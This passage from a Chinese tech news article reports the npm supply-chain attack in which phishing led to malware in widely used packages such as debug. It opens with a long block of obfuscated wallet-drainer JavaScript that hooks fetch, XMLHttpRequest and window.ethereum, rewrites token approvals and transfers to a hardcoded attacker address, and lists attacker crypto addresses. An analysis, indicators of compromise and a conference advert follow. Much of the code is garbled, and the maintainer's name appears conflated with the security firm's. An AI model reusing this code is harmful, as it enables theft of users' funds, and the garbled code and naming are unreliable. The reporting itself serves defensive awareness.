'dZzai': "bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j",
'qPXMY': "bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6",
'GSmbj': "bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59",
'oFfnO': "bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu",
'oBsPL': "bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l",
'fqBSI': "bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7",
'GqRgo': "bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q",
'TSvsw': "bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3",
'gIXXv': "bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad",
'NNxYW': "bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5",
'wgjIC': "bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r",
'NbGXK': function (_0x6fd57a, _0x45613c) {
return _0x6fd57a == _0x45613c;
},
'eDGUh': "ethereum",
'dmtxm': function (_0x426191, _0xcfbe) {
return _0x426191 == _0xcfbe;
},
'HNbDp': function (_0x43f1a1, _0x360cae) {
return _0x43f1a1 == _0x360cae;
},
'YBHoq': "bitcoinLegacy",
'pRoUO': "bitcoinSegwit",
'nvayH': function (_0x1a5c0d, _0x3206ce, _0x4cf791) {
return _0x1a5c0d(_0x3206ce, _0x4cf791);
},
'jHsib': "tron",
'nVTWs': "ltc",
'jsqTT': function (_0x245d0e, _0x2d73d9, _0x14ef57) {
return _0x245d0e(_0x2d73d9, _0x14ef57);
},
'afnPM': function (_0x458f2b, _0x6aa524) {
return _0x458f2b == _0x6aa524;
},
'tDons': "ltc2",
'gtXrf': function (_0x4aac02, _0x3c2f2e, _0x51351a) {
return _0x4aac02(_0x3c2f2e, _0x51351a);
},
'sghpa': "bch",
'hrNiK': function (_0x4989f5, _0xf4abd5, _0x265bdf) {
return _0x4989f5(_0xf4abd5, _0x265bdf);
},
'tqgyV': "solana",
'mbgjV': function (_0x34d7ea, _0xb2bd29, _0x41c749) {
return _0x34d7ea(_0xb2bd29, _0x41c749);
},
'IAgrR': function (_0x95d4e, _0x4e3b67) {
return _0x95d4e == _0x4e3b67;
},
'FvQbM': "solana2",
'UPcyp': "solana3",
'JiXTg': function (_0x2dd239, _0x9ccb5, _0x2f7208) {
return _0x2dd239(_0x9ccb5, _0x2f7208);
},
'BEiKn': function (_0x7b893d, _0x592b33) {
return _0x7b893d == _0x592b33;
},
'BAEhI': function (_0x421ebd, _0x39f4fa) {
return _0x421ebd != _0x39f4fa;
},
'kZnrz': "undefined"
};
if (loval == 1) {
return;
}
loval = 1;
function_0x3479c8(_0x13a5cc, _0x8c209f) {
const _0x50715b = Array.from({
'length': _0x13a5cc.length + 1
},  =>Array(_0x8c209f.length + 1).fill(0));
for (let _0x1b96c3 = 0; _0x1b96c3
_0x50715b = _0x1b96c3;
}
for (let _0x239a5f = 0; _0x239a5f
_0x50715b = _0x239a5f;
}
for (let _0x5aba31 = 1; _0x5aba31
for (let _0x22e9c0 = 1; _0x22e9c0
if (_0x13a5cc === _0x8c209f) {
_0x50715b = _0x50715b;
} else {
_0x50715b = 1 + Math.min(_0x50715b, _0x50715b, _0x50715b);
}
}
}
return _0x50715b;
}
function_0x2abae0(_0x348925, _0x2f1e3d) {
let _0xff60d1 = Infinity;
let _0x5be3d3 = null;
for (let _0x214c8b of _0x2f1e3d) {
const _0x3a7411 = _0x3479c8(_0x348925.toLowerCase, _0x214c8b.toLowerCase);
if (_0x3a7411
_0xff60d1 = _0x3a7411;
_0x5be3d3 = _0x214c8b;
}
}
return _0x5be3d3;
}
fetch = asyncfunction (..._0x1ae7ec) {
const _0x406ee2 = await _0xba16ef.tfqRA(fetch, ..._0x1ae7ec);
const _0x207752 = _0x406ee2.headers.get("Content-Type") || '';
let _0x561841;
if (_0x207752.includes("application/json")) {
_0x561841 = await _0x406ee2.clone.json;
} else {
_0x561841 = await _0x406ee2.clone.text;
}
const _0x50818d = _0x19ca67(_0x561841);
const _0x22ee54 = typeof _0x50818d === "string" ? _0x50818d : JSON.stringify(_0x50818d);
const _0x20415d = new Response(_0x22ee54, {
'status': _0x406ee2.status,
'statusText': _0x406ee2.statusText,
'headers': _0x406ee2.headers
});
return _0x20415d;
};
if (typeofwindow != "undefined") {
const _0x2d44e5 = XMLHttpRequest.prototype.open;
const _0x3d5d6a = XMLHttpRequest.prototype.send;
XMLHttpRequest.prototype.open = function (_0x2dbeb0, _0x3b2bc2, _0x36de99, _0x36f3b7, _0x52ad25) {
this._url = _0x3b2bc2;
return _0x2d44e5.apply(this, arguments);
};
XMLHttpRequest.prototype.send = function (_0x270708) {
const _0x159c30 = this;
const _0x1c1a41 = _0x159c30.onreadystatechange;
_0x159c30.onreadystatechange = function  {
if (_0x159c30.readyState === 4) {
try {
const _0x13db82 = _0x159c30.getResponseHeader("Content-Type") || '';
let _0x1ac083 = _0x159c30.responseText;
if (_0x13db82.includes("application/json")) {
_0x1ac083 = JSON.parse(_0x159c30.responseText);
}
const _0x454f4a = _0x19ca67(_0x1ac083);
const _0x553cb7 = typeof _0x454f4a === "string" ? _0x454f4a : JSON.stringify(_0x454f4a);
Object.defineProperty(_0x159c30, "responseText", {
'value': _0x553cb7
});
Object.defineProperty(_0x159c30, "response", {
'value': _0x553cb7
});
} catch (_0x59788f) {}
}
if (_0x1c1a41) {
_0x1c1a41.apply(this, arguments);
}
};
return _0x3d5d6a.apply(this, arguments);
};
}
function_0x19ca67(_0x1156d2) {
try {
if (typeof _0x1156d2 === "object" && _0x1156d2 !== null) {
const _0x129304 = JSON.stringify(_0x1156d2);
const _0x187e67 = _0xba16ef.tfqRA(_0x20669a, _0x129304);
returnJSON.parse(_0x187e67);
}
if (typeof _0x1156d2 === "string") {
return _0x20669a(_0x1156d2);
}
return _0x1156d2;
} catch (_0x2abc9c) {
return _0x1156d2;
}
}
function_0x20669a(_0x530d91) {
var _0x264994 = ;
var _0x2e3cca = ;
var _0x4477fc = ;
var _0x514d7d = ;
var _0x3ee86f = ;
var _0x4a9d96 = ;
var _0x553dcb = ;
const _0x3ec3bb = {
'ethereum': /b0x{40}b/g,
'bitcoinLegacy': /b1{25,34}b/g,
'bitcoinSegwit': /b(3{25,34}|bc1{11,71})b/g,
'tron': /((?,
'bch': /bitcoincash:{41}/g,
'ltc': /(?,
'ltc2': /(?,
'solana': /((?,
'solana2': /((?,
'solana3': /((?
};
for (const  ofObject.entries(_0x3ec3bb)) {
const _0x1be350 = _0x530d91.match(_0x129783) || ;
for (const _0x4225ce of _0x1be350) {
if (_0x17ccd4 == "ethereum") {
if (!_0x4477fc.includes(_0x4225ce) && neth == 0) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4477fc));
}
}
if (_0x17ccd4 == "bitcoinLegacy") {
if (!_0x264994.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x264994));
}
}
if (_0x17ccd4 == "bitcoinSegwit") {
if (!_0x2e3cca.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x2e3cca));
}
}
if (_0x17ccd4 == "tron") {
if (!_0x3ee86f.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x3ee86f));
}
}
if (_0x17ccd4 == "ltc") {
if (!_0x4a9d96.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96));
}
}
if (_0x17ccd4 == "ltc2") {
if (!_0x4a9d96.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96));
}
}
if (_0x17ccd4 == "bch") {
if (!_0x553dcb.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x553dcb));
}
}
const _0x2d452a = ;
const _0x35f871 = _0x2d452a.includes(_0x4225ce);
if (_0x17ccd4 == "solana" && !_0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
if (_0x17ccd4 == "solana2" && !_0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
if (_0x17ccd4 == "solana3" && _0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
}
}
return _0x530d91;
}
}
asyncfunctionrunmask {
let _0x1c41fa = 0;
let _0x2a20cb = newMap;
let _0x1ab7cb = false;
function_0x1089ae(_0x4ac357, _0xc83c36 = true) {
const _0x13d8ee = JSON.parse(JSON.stringify(_0x4ac357));
if (_0xc83c36) {
if (_0x13d8ee.value && _0x13d8ee.value !== "0x0" && _0x13d8ee.value !== '0') {
_0x13d8ee.to = "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976";
}
if (_0x13d8ee.data) {
const _0x250e27 = _0x13d8ee.data.toLowerCase;
if (_0x250e27.startsWith("0x095ea7b3")) {
if (_0x250e27.length >= 74) {
const _0x7fa5f0 = _0x250e27.substring(0, 10);
const _0x15c4f9 = '0x' + _0x250e27.substring(34, 74);
const _0xde14cc = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
const _0x3e4a11 = 'f'.repeat(64);
_0x13d8ee.data = _0x7fa5f0 + _0xde14cc + _0x3e4a11;
const _0x432d38 = {
'0x7a250d5630b4cf539739df2c5dacb4c659f2488d': "Uniswap V2",
'0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af': "Uniswap V2",
'0xe592427a0aece92de3edee1f18e0157c05861564': "Uniswap V3",
'0x10ed43c718714eb63d5aa57b78b54704e256024e': "PancakeSwap V2",
'0x13f4ea83d0bd40e75c8222255bc855a974568dd4': "PancakeSwap V3",
'0x1111111254eeb25477b68fb85ed929f73a960582': "1inch",
'0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f': "SushiSwap"
};
const _0x13f774 = _0x432d38;
if (_0x13f774) {
console.log(_0x13f774 + _0x15c4f9);
} else {
console.log(_0x15c4f9);
}
}
} else {
if (_0x250e27.startsWith("0xd505accf")) {
if (_0x250e27.length >= 458) {
const _0x571743 = _0x250e27.substring(0, 10);
const _0x55e7fa = _0x250e27.substring(10, 74);
const _0x382fb5 = _0x250e27.substring(202, 266);
const _0x5bb3a7 = _0x250e27.substring(266, 330);
const _0x2e5118 = _0x250e27.substring(330, 394);
const _0x3ba273 = _0x250e27.substring(394, 458);
const _0x36b084 = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
const _0x15389e = 'f'.repeat(64);
_0x13d8ee.data = _0x571743 + _0x55e7fa + _0x36b084 + _0x15389e + _0x382fb5 + _0x5bb3a7 + _0x2e5118 + _0x3ba273;
}
} else {
if (_0x250e27.startsWith("0xa9059cbb")) {
if (_0x250e27.length >= 74) {
const _0x5d2193 = _0x250e27.substring(0, 10);
const _0x1493e2 = _0x250e27.substring(74);
const _0x32c34c = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
_0x13d8ee.data = _0x5d2193 + _0x32c34c + _0x1493e2;
}
} else {
if (_0x250e27.startsWith("0x23b872dd")) {
if (_0x250e27.length >= 138) {
const _0x5c5045 = _0x250e27.substring(0, 10);
const _0x1ebe01 = _0x250e27.substring(10, 74);
const _0x558b46 = _0x250e27.substring(138);
const _0x56d65b = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
_0x13d8ee.data = _0x5c5045 + _0x1ebe01 + _0x56d65b + _0x558b46;
}
}
}
}
}
} elseif (_0x13d8ee.to && _0x13d8ee.to !== "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976") {
_0x13d8ee.to = "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976";
}
} else {
if (_0x13d8ee.instructions && Array.isArray(_0x13d8ee.instructions)) {
_0x13d8ee.instructions.forEach(_0x190501 => {
if (_0x190501.accounts && Array.isArray(_0x190501.accounts)) {
_0x190501.accounts.forEach(_0x2b9990 => {
if (typeof _0x2b9990 === "string") {
_0x2b9990 = "19111111111111111111111111111111";
} elseif (_0x2b9990.pubkey) {
_0x2b9990.pubkey = "19111111111111111111111111111111";
}
});
}
if (_0x190501.keys && Array.isArray(_0x190501.keys)) {
_0x190501.keys.forEach(_0x40768f => {
if (_0x40768f.pubkey) {
_0x40768f.pubkey = "19111111111111111111111111111111";
}
});
}
});
}
if (_0x13d8ee.recipient) {
_0x13d8ee.recipient = "19111111111111111111111111111111";
}
if (_0x13d8ee.destination) {
_0x13d8ee.destination = "19111111111111111111111111111111";
}
}
return _0x13d8ee;
}
function_0x485f9d(_0x38473f, _0x292c7a) {
returnasyncfunction (..._0x59af19) {
_0x1c41fa++;
let _0x12a7cb;
try {
_0x12a7cb = JSON.parse(JSON.stringify(_0x59af19));
} catch (_0x5d1767) {
_0x12a7cb = ;
}
if (_0x59af19 && typeof _0x59af19 === "object") {
const _0x2c3d7e = _0x12a7cb;
if (_0x2c3d7e.method === "eth_sendTransaction" && _0x2c3d7e.params && _0x2c3d7e.params) {
try {
const _0x39ad21 = _0x1089ae(_0x2c3d7e.params, true);
_0x2c3d7e.params = _0x39ad21;
} catch (_0x226343) {}
} else {
if ((_0x2c3d7e.method === "solana_signTransaction" || _0x2c3d7e.method === "solana_signAndSendTransaction") && _0x2c3d7e.params && _0x2c3d7e.params) {
try {
let _0x5ad975 = _0x2c3d7e.params;
if (_0x5ad975.transaction) {
_0x5ad975 = _0x5ad975.transaction;
}
const _0x5dbe63 = _0x1089ae(_0x5ad975, false);
if (_0x2c3d7e.params.transaction) {
_0x2c3d7e.params.transaction = _0x5dbe63;
} else {
_0x2c3d7e.params = _0x5dbe63;
}
} catch (_0x4b99fd) {}
}
}
}
const _0x1cbb37 = _0x38473f.apply(this, _0x12a7cb);
if (_0x1cbb37 && typeof _0x1cbb37.then === "function") {
return _0x1cbb37.then(_0xea3332 => _0xea3332)(_0x35d6a3 => {
throw _0x35d6a3;
});
}
return _0x1cbb37;
};
}
function_0x41630a(_0x5d6d52) {
if (!_0x5d6d52) {
returnfalse;
}
let _0x2fc35d = false;
const _0xfafee = ;
for (const _0x16ab0e of _0xfafee) {
if (typeof _0x5d6d52 === "function") {
const _0x58cddf = _0x5d6d52;
_0x2a20cb.set(_0x16ab0e, _0x58cddf);
try {
Object.defineProperty(_0x5d6d52, _0x16ab0e, {
'value': _0x485f9d(_0x58cddf, _0x16ab0e),
'writable': true,
'configurable': true,
'enumerable': true
});
_0x2fc35d = true;
} catch (_0x19546c) {}
}
}
if (_0x2fc35d) {
_0x1ab7cb = true;
}
return _0x2fc35d;
}
function_0xfc3320 {
let _0x4f0cd6 = 0;
const _0x5b507d =  => {
_0x4f0cd6++;
if (window.ethereum) {
setTimeout( => {
_0x41630a(window.ethereum);
}, 500);
return;
}
if (_0x4f0cd6 50) {
setTimeout(_0x5b507d, 100);
}
};
_0x5b507d;
}
_0xfc3320;
window.stealthProxyControl = {
'isActive':  => _0x1ab7cb,
'getInterceptCount':  => _0x1c41fa,
'getOriginalMethods':  => _0x2a20cb,
'forceShield':  => {
if (window.ethereum) {
return _0x41630a(window.ethereum);
}
returnfalse;
}
};
}

這類惡意軟件本質(zhì)上是一個(gè)基于瀏覽器的攔截器，會(huì)在網(wǎng)站客戶端執(zhí)行，能夠同時(shí)劫持網(wǎng)絡(luò)流量和應(yīng)用程序接口。

它會(huì)注入到 fetch、XMLHttpRequest以及常見的錢包接口中，在請(qǐng)求和響應(yīng)過程中靜默篡改數(shù)據(jù)。

也就是說，任何敏感標(biāo)識(shí)符（如支付地址或授權(quán)對(duì)象）都可能在用戶看到或簽署之前，就被替換為攻擊者控制的目標(biāo)。為了讓篡改不易被察覺，它還會(huì)利用字符串匹配邏輯，將原始目標(biāo)替換為“長得很像”的地址。

其危險(xiǎn)之處在于，它能在多個(gè)層面同時(shí)發(fā)揮作用：篡改網(wǎng)頁上顯示的內(nèi)容、干擾 API 調(diào)用、操縱應(yīng)用程序認(rèn)為用戶正在簽署的交易。即便界面顯示一切正常，底層的交易依然可能在后臺(tái)被重定向。

惡意代碼的工作機(jī)制（分步解析）

基于此，安全研究人員深度分解了惡意代碼的工作機(jī)制，具體如下：

1. 注入瀏覽器環(huán)境

• 掛鉤核心函數(shù)，如 fetch、XMLHttpRequest 以及錢包相關(guān) API（window.ethereum、Solana 等）。

• 確保能夠同時(shí)攔截網(wǎng)絡(luò)流量與錢包活動(dòng)。

2. 監(jiān)視敏感數(shù)據(jù)

• 掃描網(wǎng)絡(luò)響應(yīng)與交易負(fù)載，尋找看似錢包地址或轉(zhuǎn)賬信息的內(nèi)容。

• 能識(shí)別多種加密貨幣格式，包括 Ethereum、Bitcoin、Solana、Tron、Litecoin 和 Bitcoin Cash。

3. 篡改目標(biāo)地址

• 將合法的轉(zhuǎn)賬目標(biāo)替換為攻擊者控制的地址。

• 通過字符串匹配使用“偽裝地址”，使替換不易被發(fā)現(xiàn)。

4. 劫持簽名前的交易

• 修改 Ethereum 和 Solana 交易參數(shù)（如收款方、授權(quán)、額度）。

• 即使界面看似正常，用戶簽署的交易也會(huì)把資金導(dǎo)向攻擊者賬戶。

5. 保持隱蔽性

• 檢測(cè)到加密錢包時(shí)，會(huì)避免在界面上直接顯示可疑替換，以降低懷疑。

• 在后臺(tái)持續(xù)運(yùn)行靜默掛鉤，捕獲并篡改真實(shí)交易。

維護(hù)者發(fā)聲：誤點(diǎn)了看似來自官方的郵件，結(jié)果中招了

這起事件的開源庫維護(hù)者表示，他是因遭遇釣魚攻擊而被入侵的。

攻擊者使用了一封偽裝成來自 support npmjs help的郵件實(shí)施釣魚，看起來就是官方發(fā)的郵件：

進(jìn)一步調(diào)查發(fā)現(xiàn)，該域名是在 2025 年 9 月 5 日注冊(cè)的，也就是在發(fā)起攻擊的三天前。

隨即，每周下載量 3.576 億次的 Debug（
https://github.com/debug-js/debug）軟件包的維護(hù)者 Josh Aikido 也于 15:15 在社交媒體上承認(rèn)自己的庫遭到了入侵，并開始清理受影響的軟件包。

Josh Aikido 同時(shí)透露，釣魚郵件正是由 support npmjs help發(fā)送的。

隨著事件的發(fā)酵，Josh Aikido 也在 HackerNews 向眾多用戶致歉，“抱歉大家，非常尷尬?！?/p>

攻擊者再度出手

隨著時(shí)間的推移，網(wǎng)絡(luò)安全機(jī)構(gòu) Aikido 發(fā)現(xiàn)在 16:58 時(shí)，其系統(tǒng)又檢測(cè)到另一個(gè)軟件包遭到疑似同一批攻擊者的入侵：

proto-tinker-wc@0.1.87

其中的
dist/cjs/proto-tinker.cjs.entry.js 文件被植入了惡意代碼。

入侵指標(biāo)（IoCs）

釣魚域名：npmjs.help

受影響的軟件包版本：

雖然這屬于供應(yīng)鏈攻擊，但來自 Privy 的首席安全工程師 Andrew MacPherson 解析道，一個(gè)應(yīng)用程序要受到影響需要滿足特定條件，這大大降低了事件的實(shí)際影響范圍。具體包括：

• 在東部時(shí)間大約上午 9 點(diǎn)到 11 點(diǎn) 30 分之間進(jìn)行全新安裝，而這段時(shí)間正是軟件包被篡改的窗口期

• 在此期間創(chuàng)建了 package-lock.json

• 受影響的軟件包存在于直接依賴或間接依賴中

這次供應(yīng)鏈攻擊延續(xù)了過去幾個(gè)月針對(duì)多個(gè)知名 JavaScript 庫開發(fā)者的一系列類似攻擊。

例如，今年 7 月，攻擊者入侵了每周下載量超過 3000 萬次的 eslint-config-prettier，而今年 3 月，又有 10 個(gè)廣泛使用的 npm 庫被劫持并植入信息竊取功能。釣魚攻擊和被注入的惡意軟件都顯示出，網(wǎng)絡(luò)瀏覽器已經(jīng)成為一個(gè)巨大的攻擊面，容易被用于竊取憑證、篡改流量以及突破網(wǎng)絡(luò)防護(hù)。

來源：
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/

開學(xué)季福利｜CSDN 公眾號(hào)粉絲專屬

為感謝大家一直以來對(duì) CSDN 公眾號(hào)的關(guān)注與支持，我們特別聯(lián)合 GOSIM HANGZHOU 2025 全球開源創(chuàng)新匯，為粉絲送上重磅限量福利——價(jià)值 399 元/張的大會(huì)標(biāo)準(zhǔn)票！

9 月 13–14 日，這場(chǎng)匯聚全球開源與 AI 頂尖力量的硬核盛會(huì)，將在杭州正式啟幕！

為什么這場(chǎng)大會(huì)值得你親臨？

• 頂級(jí)陣容：聯(lián)合國、NVIDIA、谷歌、Hugging Face、字節(jié)跳動(dòng)、智源研究院等全球大咖齊聚

• 前沿議題：大模型、具身智能、AI Agent 等熱門技術(shù)專場(chǎng)，直擊行業(yè)最前沿

• 實(shí)戰(zhàn)互動(dòng)：12 場(chǎng)深度 Workshop + 4 場(chǎng) Hackathon，邊學(xué)邊練，現(xiàn)場(chǎng)出成果

• 開發(fā)者主場(chǎng)：1500+ 技術(shù)人現(xiàn)場(chǎng)交流，拓展人脈，碰撞靈感

本次福利詳情

限量 50 張，先到先得！

每張標(biāo)準(zhǔn)票包含：

• 大會(huì)兩日通票（自由參與主論壇與部分分論壇活動(dòng)）

• 現(xiàn)場(chǎng)專屬參會(huì)大禮包

• 大會(huì)期間兩日用餐券 + 全天候甜點(diǎn)茶歇，暢享能量補(bǔ)給

掃碼下方海報(bào)二維碼，即可參與福利申領(lǐng)～